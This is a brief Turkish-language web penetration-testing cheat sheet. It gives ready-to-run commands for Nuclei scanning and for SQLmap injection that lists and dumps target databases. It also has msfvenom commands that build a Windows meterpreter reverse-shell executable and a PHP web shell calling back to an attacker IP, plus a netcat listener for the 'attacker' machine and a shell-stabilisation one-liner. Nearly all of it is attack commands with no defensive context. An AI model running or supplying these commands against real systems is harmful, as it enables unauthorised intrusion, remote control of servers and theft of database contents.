Web Vulnerability
Cheat Sheet
Web Vulnerability
Web Vulnerability
Web Araçlarını barındırır.
Nuclei
Web sızma testlerinde en çok tercih edilen zafiyet tarama aracı.
Tüm Şablonları Güncelle
nuclei -update-templates
Temel Tarama
nuclei -u http://hedefsite.com
SQLmap
Otomatik SQL Injection Aracı
Parametreyi Test Etme ve Veritabanlarını Listeleme
sqlmap -u "http://site.com/product.php?id=1" --dbs --batch
Belirli Bir Veritabanının Tablolarını Çekme
sqlmap -u "http://site.com/product.php?id=1" -D veritabanı_ismi --tables
Verileri Dump Etme (Dışarı Aktarma)
sqlmap -u "http://site.com/product.php?id=1" -D veritabanı_ismi -T tablo_ismi -C kolon1,kolon2 --dump
MSFVenom
Payload Oluşturma
Windows İçin Reverse Shell (Exe)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=SENIN_IP LPORT=4444 -f exe -o sızma.exe
PHP Web Shell (Web siteleri için)
msfvenom -p php/meterpreter/reverse_tcp LHOST=SENIN_IP LPORT=4444 -f raw -o shell.php
Netcat
Kendi makineni (Saldırgan) dinlemeye al
nc -lvnp 4444
Shell Stabilizasyon
Shell stabilizasyonu yapar.
Shell stabilizasyonu
python3 -c 'import pty; pty.spawn("/bin/bash")'